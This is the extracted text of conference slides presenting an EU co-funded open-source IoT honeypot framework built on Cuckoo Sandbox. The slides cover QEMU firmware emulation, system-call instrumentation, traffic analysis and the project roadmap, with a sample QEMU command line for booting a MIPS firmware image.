NCSC One: IoT HoneypotPieter Jansen & Jurriaan Bremer

On the agenda:

1. Introduction2. SBIR3. Cuckoo Sandbox4. Project5. Architecture6. Offline demo7. Roadmap

Introduction

Pieter Jansen

- CEO @ Cybersprint- https://cybersprint.com- Team of 25 enthusiasts- Since 2015- 100% Dutch

- Digital Risk Protection services

Jurriaan Bremer

- CEO, Hatching- https://hatching.io/

- Lead Developer, Cuckoo Sandbox- https://cuckoosandbox.org/

- 6+ years development on Cuckoo

- Growing R&D team

SBIRThis SBIR project is co-fundedby the Internal Security Fundof the European Union

Balancing Security and Mobility

SBIR

- EU co-funded Project

- SBIR stage 1 (feasibility)

- SBIR stage 2 (realisation)

- SBIR stage 3 (valorisation)

- https://www.rvo.nl/subsidies-regelingen/sbir

You are here

Cuckoo Sandbox

Cuckoo Sandbox

- Leading open source automated malware analysis project- https://cuckoosandbox.org/

- Widely used throughout the security community

- Hatching is the driving force behind the majority of Cuckoo innovations

- Cuckoo forms basis of the IoT Honeypot project

Project

- Goal: develop a firmware-based, open source Internet of Things (IoT) honeypot framework

- Consumer network devices, e.g., those used by NCSC.NL personnel at home- IP camera’s, smart devices, etc

- Reason: Mirai, Haijime, etc..

Project [1/2]

Hajime Botnet Makes a Comeback With Massive Scan for MikroTik

Routers

Project overview - replication vs emulation

Replication-approach

1. Connect to an IoT device2. Store the conversation (example: HTML files)3. Spin up a service on the same port/protocol4. Playback the earlier captured conversation

Replication-approach - conclusions

Easy to set up fake environments

Did not go past login screen

Was not convincing enough for attackers

Would only capture attempts, not infections

Project

- Replication alternative did not work

- Goal: create open source IoT Honeypotting framework- Goal: detect large-scale IoT compromise campaigns- Goal: detect new threats, generate new IoCs

- Default credentials, exploits, etc

- Scales: run dozens of IoT devices using a single server- Without requiring the original hardware- Relatively low cost & maintenance effort

[2/2]

Existing projects

- pyREbox, PANDA, DECAF, ISP RAS.

- x86-only (pyREbox) and x86/ARM (PANDA, different use-case)

- IoT firmware often ARM/MIPS/etc

High-level project overview

- Emulate IoT firmware using QEMU- Expose listening network services

- Either to internal networks or public IPv4 / IPv6 addresses

- Instrument behavioral aspects of running firmware- …- Wait for device to be compromised!

Goal of the project?

- Once a device is compromised, investigate :-)- Got system call traces and PCAPs- Reconstruct traffic to isolate exploit and/or payload

- Alternative use-case: honey tokens- Intentionally vulnerable devices with interesting names (eg FREDERIKSKAZERNE CAM51)- Notifies owners if attackers abuse it

Architecture

IoT Honeypot Architecture

QEMU

Loading of firmware non-trivial:

- In practice most firmware is non-x86: ARM & MIPS- Needs specific QEMU command-line parameters etc

Instrumentation of QEMU interesting:

- Not so much existing research on non-x86 QEMU VMI- Virtual Machine Introspection

- Instrumentation required to learn what device is doing- E.g., logging system calls such as execve(2)

Gathering results

- We obtain network traffic from the outside- We obtain system calls from the device- Realtime data processing- Results stored for later research- Alerts emitted to custom Dashboard

- Known vulnerability was used- ...

QEMU Command-line usage MIPS image

/home/jbr/git/quailbox-qemu/build/mips-softmmu/qemu-system-mips

-kernel /home/jbr/.quailbox/kernels/vmlinux-3.18.120-4kc-malta-cuckoo

-nographic

-netdev tap,id=net0,ifname=tap_qemu,script=no,downscript=no

-M malta -m 512

-hda /home/jbr/.quailbox/images/ext2fs-for-netgear-wnap210.image

-device e1000,netdev=net0

-display none

-append console=ttyS0

rw root=/dev/sda init=/sbin/init

QEMU Tiny Code Generator (“TCG”)

- Efficient engine for translating ARM/MIPS/etc into an IL- Intermediate Language

- IL translated into the native Host code, e.g., x86- Needs customization to add our VMI

- Syscall capturing for ARM+MIPS- Linux Kernel modifications & tracing WIP- Memory tracking & dumping logic

- Additional changes required for new bug classes- Instrumentation for specific applications etc

Realtime tcpdump processing

- Log & process HTTP(s) requests from the outside- Present network traffic to ruling engines

- Suricata / Snort- Cuckoo / Proprietary Signatures

Offline Demo

X

X

Roadmap

Roadmap

- Create web interface for managing virtual IoT environments- “Load” support for many more firmware images- Tailored QEMU VMI support for:

- Different CPU architectures- Different known versions of Linux kernel for allowing in-depth VMI

- E.g., through Volatility / Rekall integration

- Documentation of more relevant bug classes- Capability for identifying said bug classes

- Protection against QEMU breakouts..- Interaction through simulation of peripherals like camera/files/sensors- OT/SCADA/ICS applications (virtual Borssele)- So much more.. ;-)

Valorization

Valorization: Commercial Applications

- Fuzzing as a Service- Provide security testing services for hardware providers, allowing large

scale/automated testing for any firmware

- Commercial / open source bespoke additions for specific use-cases- OT-applications, applications for non-standard firmware

- Hosting of virtual IoT Environments- Creating virtual 'digital twin' of sensitive IoT environments for research purposes- Collect threat intelligence to support adversary attribution research

How you can help

1. Share your firmware

2. Provide testing grounds

3. Spread the word!

Credits

The HoneyNED project team

Andrei Costin (ancostin@jyu.fi) Assistant Professor inCybersecurity/IoT - welcomes research and collaboration opportunities

Want to know more? Get in touch!

pj@cybersprint.com | jbr@hatching.io

Questions?